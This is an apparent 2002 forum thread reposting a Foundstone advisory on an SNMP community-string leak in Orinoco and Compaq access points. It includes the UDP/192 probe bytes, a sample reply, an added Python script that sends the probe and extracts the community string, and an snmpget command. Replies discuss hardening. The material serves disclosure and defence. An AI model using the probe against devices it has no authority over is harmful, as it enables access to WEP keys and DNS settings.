#1
Welcome to my nightmare
Join Date: May 2002
Location: r00ting y0ur b0x.
Posts: 352
Foundstone Labs Advisory - 080902-APIL
Advisory Name: Information Leakage in Orinoco and Compaq Access Points
Release Date: August 9th, 2002
Application: Orinoco Residential Gateway and Compaq WL310
Platforms: N/A
Severity: The ability to display/modify configuration information
Vendors: Orinoco (http://www.orinocowireless.com) and Compaq (http://www.compaq.com)
Authors: Marshall Beddoe (marshall.beddoe@foundstone.com), Tony Bettini (tony.bettini@foundstone.com)
CVE Candidate: CAN-2002-0812
Reference: http://www.foundstone.com/advisories

Overview:

An information leakage vulnerability exists in Orinoco and Compaq OEM access points, disclosing the unique SNMP community string. As a result, an attacker can query the community string and gain the ability to change the system configuration, including Wired Equivalent Privacy (WEP) keys and Domain Name Service (DNS) information.

Detailed Description:

The Compaq WL310 is an OEM Orinoco Residential Gateway access point. Both the Compaq and Orinoco access points use a unique identification number, printed on the bottom of the access point, for configuration through their management client. This identification string is used as the default SNMP read/write community string. The community string appears to be unchangeable, unique and not easily guessable.

By sending a specific packet to UDP port 192, the access point returns information including the firmware version and the unique identification value. The returned packet includes the value of system.sysName.0, which in the case of the Compaq WL310 and Orinoco Residential Gateway contains the unique identification value. That identification value can then be used as the SNMP community string to view and modify the configuration.

The probe packet:

"\x01\x00\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

Example probe response:

01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
00 00 00 00 00 60 1d 20 2e 38 00 00 18 19 10 f8 | .....`. .8......
4f 52 69 4e 4f 43 4f 20 52 47 2d 31 31 30 30 20 | ORiNOCO RG-1100 
30 33 39 32 61 30 00 00 00 00 00 00 00 00 00 00 | 0392a0..........
02 8f 24 02 52 47 2d 31 31 30 30 20 56 33 2e 38 | ..$.RG-1100 V3.8
33 20 53 4e 2d 30 32 55 54 30 38 32 33 32 33 34 | 3 SN-02UT0823234
32 20 56 00                                     | 2 V.

system.sysName.0 = "ORiNOCO RG-1100 0392a0"
Community name: 0392a0

Vendor Response:

Both vendors were notified of this issue on July 8th, 2002. According to Orinoco, "The Residential Gateway line has been discontinued."

Solution:

Employ packet filtering on inbound requests to deny access to ports 192/udp and 161/udp on the access point.

FoundScan has been updated to check for this vulnerability. For more information on FoundScan, see the Foundstone website: http://www.foundstone.com

Disclaimer:

The information contained in this advisory is copyright (c) 2002 Foundstone, Inc. and is believed to be accurate at the time of publishing, but no representation of any warranty is given, express or implied, as to its accuracy or completeness. In no event shall the author or Foundstone be liable for any direct, indirect, incidental, special, exemplary or consequential damages resulting from the use or misuse of this information.

This advisory may be redistributed, provided that no fee is assigned and that the advisory is not modified in any way.
__________________
g0tr00t "It's all fun and games until someone gets killed."
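The probe/response exchange the advisory describes, as an added example (this is not Foundstone's code or the FoundScan check). It builds the UDP/192 name probe and parses the reply into sysName, the version string and the candidate community name. The field offsets are inferred from the single reply dump printed in the advisory, not from vendor documentation: the probe is built as 116 bytes, taking the 0x70 at offset 4 as the count of bytes after the four-byte header, which is one byte shorter than the advisory's listing. The embedded reply bytes are the advisory's hex dump, so the parser can be exercised offline.

```python
"""Build the Orinoco RG / Compaq WL310 UDP/192 name probe and parse the reply.

Added example; not Foundstone's code or the FoundScan check. The field
layout below is inferred from the single reply dump in the advisory and is
not vendor documentation:
  offset 0-3   four-byte header: 01 00 00 00 in the probe, 01 01 00 00 in the reply
  offset 4     0x70 = 112 = bytes that follow the header, so a full probe is
               116 bytes (the advisory's listing has one byte more)
  offset 48    NUL-terminated system.sysName.0, e.g. "ORiNOCO RG-1100 0392a0"
  offset 84    NUL-terminated model/firmware/serial string
"""
import re
import socket

NAME_PROBE_PORT = 192
PROBE_LEN = 116
SYSNAME_OFFSET = 48
VERSION_OFFSET = 84


def build_probe() -> bytes:
    """01 00 00 00 70, zero-padded to 116 bytes."""
    probe = bytearray(PROBE_LEN)
    probe[0] = 0x01
    probe[4] = PROBE_LEN - 4          # 0x70
    return bytes(probe)


def _cstring(buf: bytes, offset: int) -> str:
    """ASCII string starting at offset, terminated by the first NUL."""
    end = buf.find(b"\x00", offset)
    end = len(buf) if end < 0 else end
    return buf[offset:end].decode("ascii", errors="replace")


def parse_reply(reply: bytes) -> dict:
    """Pull sysName, the version string and the candidate community name out of a reply."""
    if len(reply) <= VERSION_OFFSET or reply[0] != 0x01:
        raise ValueError("not a name-probe reply")
    sysname = _cstring(reply, SYSNAME_OFFSET)
    version = _cstring(reply, VERSION_OFFSET)
    # Stock RG units put the six-hex-digit identifier at the end of sysName;
    # that identifier is the default read/write community string.
    m = re.search(r"\b([0-9a-f]{6})$", sysname.strip(), re.IGNORECASE)
    return {
        "sysname": sysname,
        "version": version,
        "community_candidate": m.group(1) if m else None,
    }


def probe_host(host: str, timeout: float = 2.0) -> dict:
    """Send one probe and parse the answer. Only point this at devices you are authorised to test."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_probe(), (host, NAME_PROBE_PORT))
        data, _ = sock.recvfrom(512)
    return parse_reply(data)


# The reply bytes exactly as printed in the advisory's hex dump, so the parser
# can be exercised offline.
ADVISORY_REPLY = bytes.fromhex(
    "01010000000000000000000000000000"
    "00000000000000000000000000000000"
    "0000000000601d202e380000181910f8"
    "4f52694e4f434f2052472d3131303020"
    "30333932613000000000000000000000"
    "028f240252472d313130302056332e38"
    "3320534e2d3032555430383233323334"
    "32205600"
)

if __name__ == "__main__":
    print(parse_reply(ADVISORY_REPLY))
```

On the advisory's dump this yields sysName "ORiNOCO RG-1100 0392a0", the version string "RG-1100 V3.83 SN-02UT08232342 V" and the candidate community "0392a0". The second step the advisory describes is an ordinary SNMPv1 request using that string as the community (with net-snmp, snmpget -v1 -c 0392a0 <ip> sysName.0); the packet filter the advisory recommends on 192/udp and 161/udp blocks both steps from outside the LAN.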
#2
Registered Member
Join Date: Jul 2002
Location: Ohio - The armpit of it all
Posts: 138
Re: Foundstone Labs Advisory - Information Leakage in Orinoco and Compaq Access Points
Good info, but that's assuming that the SOHO user has actually installed or configured some sort of security on the AP...
I am still amazed that most people, at the very least, don't even bother to password-protect their APs... oh well... I'm preaching to the choir.
__________________
BWS Technology is NO PLACE FOR WHIMPS
#3
Do I look like I'm joking
Join Date: Apr 2002
Location: SoCal, OC
Posts: 4,507
Re: Re: Foundstone Labs Advisory - Information Leakage in Orinoco and Compaq Access Points
Quote:
__________________
-=BW=-
#5
Registered Member
Join Date: Apr 2002
Posts: 37
Easier than that.
The security on the RG units was horrible.
That community name is also the SSID and the last 6 digits of the MAC address of the wireless card, and the last 5 digits are used as a 64-bit ASCII WEP key. To make things worse, the RG Manager wouldn't let you make any changes. On the plus side, the AP Manager can configure the RG units. I'll have to play around with my locked-down RG unit and check my RG-1000s running the AP-1000 and AP-500 firmware to see if they give away any valuable information.

HcRUL
#6
Registered Member
Join Date: Jul 2002
Location: Ohio - The armpit of it all
Posts: 138
Re: Easier than that.
Quote:
Personally, I think the whole damn lot should be lined up and shot. But hey, that's just my opinion. So, on our wall of idiots, we've got a dead heat for last place: lawyers, used car sales folks, pretty much everybody in Congress, and consumer electronics sales pukes.
__________________
BWS Technology is NO PLACE FOR WHIMPS
#7
Squaaawk! WiFi! WiFi!
Join Date: Apr 2002
Location: Tinsel Town
Posts: 1,682
Re: Easier than that.
Quote:
__________________
~lincomatic
#8
Registered Member
Join Date: Apr 2002
Posts: 37
Playing with Perl now to test this on a stock RG1000. I cannot get it to reply to their "probe packet", but sending "08010311031503170320" to UDP port 192 I get a reply of the modem connection information.
I am currently using the modem of the RG1000 to dial into the internet and there is no wireless LAN. I'll play around with it some more, but I don't know how much longer I can stay awake. If I get more info I'll post it here, and when I can think clearly enough to clean up the code I'll post a Perl script to probe the RG.

HcRUL
#9
Registered Member
Join Date: Apr 2002
Posts: 37
There is no news...
Okay, I'm really not impressed. After looking into this I do not see a point to their advisory.

First off, their probe packet has an extra byte. That is why it didn't work for me. The only difference between their packet with the correct length and the standard packet sent out by the AP Manager is the "07" byte, which is "00" from the AP Manager.

What they are "revealing" is the system name. Unfortunately for the RG, the system name contains the "magic" string that was also used for the community name. This flaw can easily be corrected by editing the system name with the AP Manager to remove the info.

The funny thing is that you can get this same information by passive means and there is no need to query the AP. This community name is also the SSID and the last 6 digits of the MAC of the wireless interface on the AP. NetStumbler grabs this same information from 3 places: first in the MAC, then in the SSID, and lastly in the name of the AP.

The trick here is not to take the stock configuration, period. In the early days you could only use the RG config util and you were severely limited in what you could do. It wouldn't let you change the SSID or WEP settings. Some time ago they modified the AP Manager to allow it to make changes to the RG series, and now all this can be changed. Although the recent version of the RG config utility is much better, I wouldn't use it and would stick to the AP Manager or Freebase.

If you have an RG and want to secure it, do the following:
- Change the SSID
- Change the read password
- Change the write password
- Change the System/AP Name
- Turn off beaconing

To sum it all up, it doesn't expose the community string, just the AP name. With the default config these are the same, but they can be changed.

HcRUL
#10
Squaaawk! WiFi! WiFi!
Join Date: Apr 2002
Location: Tinsel Town
Posts: 1,682
Yeah, you're right! I was looking again at the info in the initial post. I just wasn't reading the info in BW's initial post correctly yesterday. This is the same probe that NS sends out... I've seen it before. We all know this is how NS does "get AP Name." I've seen it w/ Ethereal before. Even D-Link APs send out "Prism II."
But the annoying thing is how the RG sends out the model/serial/firmware rev. This is just an invitation for version-specific hacking, kind of like when Linux gives out the version & kernel rev in response to a telnet. So the upshot is, if one runs AP Manager, everything is relatively safe. Good work, HcRul.
__________________
~lincomatic